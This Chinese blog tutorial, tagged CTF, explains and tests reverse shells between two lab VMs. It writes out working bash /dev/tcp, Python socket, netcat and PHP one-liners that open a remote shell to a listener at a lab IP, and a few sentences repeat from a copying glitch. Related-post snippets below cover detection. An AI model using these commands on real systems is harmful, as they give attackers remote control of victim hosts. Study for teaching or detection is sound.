反弹shell的方法和测试

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量580 收藏 1
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43847235/article/details/103074719
版权

反弹shell的概念

简单理解,通常是我们主动发起请求,去访问服务器(某个IP的某个端口),比如我们常访问的web服务器:http(https)😕/ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,然后我们就能通过反弹的shell去远程控制服务器了。

反弹shell的原理

参考这篇文章https://www.freebuf.com/articles/system/187584.html写一些自己的理解。

总的来说,就是在被攻击的机器上面开启一个交互式的bash,然后将该bash的标准输入,标准输出,和错误输出都重定向到远程(我们的攻击机器)上面,这样我们就可以在攻击机器上操纵被攻击机器了。

反弹shell有几种不同的方式,下面对各个方式进行实验

环境

  • debian kali虚拟机
  • ubuntu 16.04虚拟机

方法1 使用Linux命令来进行反弹shell

在kali中,

ifconfig


拿到kali的ip。

使用nc监听7777端口

nc -lvp 7777

在ubuntu中

bash -i >& /dev/tcp/192.168.56.102/7777 0>&1

执行后kali终端内拿到了ubuntu的shell。

接下来分析一下ubuntu(被攻击机器)执行的命令

bash -i >& /dev/tcp/192.168.56.102/7777 0>&1

  • bash -i 在本地打开一个交互式bash

  • &

    linux shell下常用的文件描述符是:

标准输入 (stdin) :代码为 0 ,使用 < 或 << ;

标准输出 (stdout):代码为 1 ,使用 > 或 >> ;

标准错误输出(stderr):代码为 2 ,使用 2> 或 2>>。

当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。
当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符

  • /dev/tcp/ip/port 建立一个socket连接到ip的port端口
    ,>&后面跟/dev/tcp/ip/port代表将标准输出和标准错误输出重定向到这个文件,也就是传递到远程上,如果远程开启了对应的端口去监听,就会接收到这个bash的标准输出和标准错误输出。
  • 0>&1 在前面命令后面加上0>&1,代表将标准输入重定向到标准输出,这里的标准输出已经重定向到了/dev/tcp/ip/port这个文件,也就是远程,那么标准输入也就重定向到了远程,这样的话就可以直接在远程输入了。

方法2 使用python来反弹shell

首先,和方法1一样,在kali上用nc监听2333端口

nc -lvp 2333

然后在ubuntu上执行命令

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.56.102',2333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"


另一边kali成功拿到反弹的shell。

原理:

首先使用socket与远程建立起连接,接下来使用到了os库的dup2方法将标准输入、标准输出、标准错误输出重定向到远程
,dup2这个方法有两个参数,分别为文件描述符fd1和fd2,当fd2参数存在时,就关闭fd2,然后将fd1代表的那个文件强行复制给fd2,
在这里可以把fd1和fd2看作是C语言里的指针,将fd1赋值给fd2,就相当于将fd2指向于s.fileno(),fileno()返回的是一个文件描述符,在这里也就是建立socket连接返回的文件描述符,于是这样就相当于将标准输入(0)、标准输出(1)、标准错误输出(2)重定向到远程(3),
接下来使用os的subprocess在本地开启一个子进程,传入参数“-i”使bash以交互模式启动,标准输入、标准输出、标准错误输出又被重定向到了远程,这样的话就可以在远程执行输入命令了。

方法3 使用nc反弹shell,需要反弹shell的机器安装nc

首先还是kali监听2333端口

nc -lvp 2333

之后ubuntu执行命令:

nc -e /bin/bash 192.168.56.102 2333

这里的-e后面跟的参数代表的是创建连接后执行的程序,这里代表在连接到远程后可以在远程执行一个本地shell(/bin/bash),也就是反弹一个shell给远程

如果nc不支持-e参数(这里我就是这个情况),可以通过以下方法:

首先在kali上监听两个不同的端口:

nc -lvp 2333
nc -lvp 2334

之后在ubuntu上执行命令:

nc 192.168.56.102 2333|/bin/bash|192.168.56.102 2334

即可在监听2333端口的终端内输入命令,在监听2334端口的终端显示输出。

使用php反弹shell

 php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.56.102/2333")'

的终端内输入命令,在监听2334端口的终端显示输出。

使用php反弹shell

 php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.56.102/2333")'
Summ4r
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于主机的反弹shell检测思路
SHELLCODE_8BIT的博客
03-16 2142
前言 难免有时候网站会存在命令执行、代码执行等漏洞可能被黑客反弹shell,如何第一时间发现反弹shell特征,kill掉相应进程,保护主机安全呢? 本文主要探究一下主机反弹shell有哪些特征,为HIDS检测主机反弹shell行为提供一些思路。 类型一 bash反弹 先从最常规的开始举个例子。 bash -i >& /dev/tcp/ip/port 0>&1 原理简单说一下,本地打开bash将标准输出、标准错误输出、标准输入通过socket链接重定向至远程 &g
HIDS反弹shell检测方法
王教主的博客
02-24 1004
检测方法 特征:shell(sh bash zsh)进程存在异常的stdin/stdout、异常参数、异常网络连接。 行为:检测大概率是在ssh登陆下才会使用的二进制文件(如ls/cat/ip/ipconfig/cd/chmod),1.如果发现这些进程的stdin/stdout和tty不一致则告警;2.如果发现这些进程的dip/dport/sip/sport和SSH_CONNECTION不一致则告警 反弹手段和检测方法 反弹方法 检测方法 bash -i >& /dev/t
Windows反弹shell测试
oscarli的博客
05-30 309
windows反弹shell测试记录
反弹shell检测增强思考
SHELLCODE_8BIT的博客
02-03 410
1.我们有内置bash命令,可以用enable查看,而想劫持这些命令,我们有如下研究和思考流程2.bash的内置命令,是否走so库,也就是是否走动态链接库,因为如果对于这些命令直接静态编译到程序中是无法劫持的,但是应该会走so(对于windows都走ntdll.dll,也就是操作系统会通过一个so库做api导出,之后最后走syscall调用具体服务,应该不会自己内置syscall在bash的代码中),也就是我们要确认如下2.1 bash内置命令是否走so库2.2 如果不走so则无法劫持。
【机器学习】基于机器学习的反弹shell命令识别
一个程序员
12-03 811
本文介绍一个基于机器学习识别反弹shell的项目。 在主机安全检测中,一般是采用基于原理的方式识别反弹shell, 通过判断socket通信相关特征,可以准确地识别到主机中的反弹shell。 但是在容器场景下,检测反弹shell 的能力,可能会受到容器网络模式的限制,在容器默认运行的bridge 模式下, 是很难通过基于原理的方式识别反弹shell的。bridge模式 反弹shell 参考资料https://xz.aliyun.com/t/6727https://help.aliyun.com/docu
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
为了更好地理解和掌握反弹shell,作者通过思维导图进行了框架整理,这有助于读者系统地了解各种反弹shell命令的原理、使用场景及检测方案。 4. **反弹姿势** 文档详细介绍了按照交互方式划分的五种类型的反弹...
Linux下NC反弹shell命令(推荐)
09-15
在网络安全和渗透测试中,反弹Shell是一种常见的技术,它允许攻击者远程控制受感染的系统。在Linux环境中,网络工具`nc`(Netcat)常被用来创建这种连接。本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作...
CVE-2018-3191 反弹shell
最新发布
05-18
7. **入侵检测系统**:部署入侵检测系统(IDS)或入侵防御系统(IPS),实时监控网络活动,及时发现并阻止反弹Shell的企图。 总的来说,理解反弹Shell的工作原理和CVE-2018-3191这样的具体漏洞对于维护网络安全至关...
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和...反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
91-91.渗透测试-通过木马反弹shell(Linux).mp4
05-10
91-91.渗透测试-通过木马反弹shell(Linux).mp4
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 3846
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
反弹shell的实现方式和检测方法
12-25 4358
我所理解的反弹shell,是外部人员通过web或者软件的漏洞,建立了一个数据流通向网络外部的shell执行环境。 现在针对一些网络上反弹shell实例作说明:   反弹shell 现在针对一些网络上反弹shell实例作说明: 实例1,Bash反弹: Bash反弹,远程主机监听端口: nc -lvp 7777 被入侵的机器反弹shell命令如下: bash -i &gt;&am...
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2415
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
Laykefu客服系统 任意文件上传漏洞,2024年最新34岁程序员年薪50w
2401_83739632的博客
04-15 380
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台,恶意攻击者可利用此问题,上传后门文件,获取服务器权限。Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。
入侵检测——如何实现反弹shell检测?
qq_42009262的博客
03-24 2673
如何实现反弹shell检测?
使用本机反弹shell
meteox的博客
09-04 642
有时候做题时懒得开服务器,或者服务器有问题用不了,都可以用本机做下内网穿透来进行反弹shell,或者得到一个公网可访问的web页面 我一般用natapp,使用起来比较简单方便 注册完成后配置下隧道本地要映射的端口 http隧道一般本地端口就设置为80,到时候本地开启phpstudy就可以直接使用。 tcp隧道根据你要监听的端口进行设置。 我这里tcp隧道的本地端口设置为1516。 下载它的客户端后直接在终端中执行命令 ./natapp -authtoken=你的authtoken 可以得到映射后的地址和端
Linux反弹shell
谢公子的博客
11-29 9314
目录 Bash反弹shell Python反弹shell 其他命令反弹shell 写入命令到定时任务文件 写入SSH公钥 写入/etc/profile文件 当我们可以在远程Linux主机上执行任意命令或写入任意数据到任意文件的时候,我们通常会通过以下方式控制远程主机。 Bash反弹shell Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,...
Linux系统反弹shell总结
Bird&Bird
06-07 1342
目录前言正向连接反向连接利用netcat反弹shell利用Bash反弹shellCurl配合Bash反弹shell反弹shell的命令写入定时任务将反弹shell的命令写入/etc/profile文件利用Socat反弹shell利用Telnet反弹shell方法方法二各种脚本反弹shellPython 脚本反弹shellphp 脚本反弹shellPerl 脚本反弹shellRuby脚本反弹shell使用Metasploit生成反弹shell用的一句话反弹shell后获取模拟终端使用OpenSSL反弹加密
ikun运球新姿势-- 反弹shell
HH_beibei的博客
01-12 612
反弹shell是一种远程控制方式,可以让攻击者在目标主机上执行命令并获得对该主机的远程控制权。攻击者可以通过各种手段(如社工攻击、漏洞利用等)在目标主机上执行恶意脚本,从而获得反弹shell。攻击者可以通过该shell执行任意命令、控制目标主机、窃取数据等。因此,反弹shell是一种高危攻击手段。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将命令行的输入输出转到攻击机。
linux下反弹shell的几种方法
热门推荐
Radiation's Blog
03-20 1万+
反弹的开始,我们需要使用nc在本地或者任意要反弹到的地方监听一个端口。最简单的做法是nc -l -p 8080,8080为要反弹的端口0x01—使用bashbash -i >& /dev/[tcp|udp]/10.1.1.19/8080 0>&1 注:该命令使用的是系统原生bash,[tcp|udp]是要使用的协议,一般选择tcp就行,10.1.1.19是你要反弹到的地址,如果要反弹到你的电脑上
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值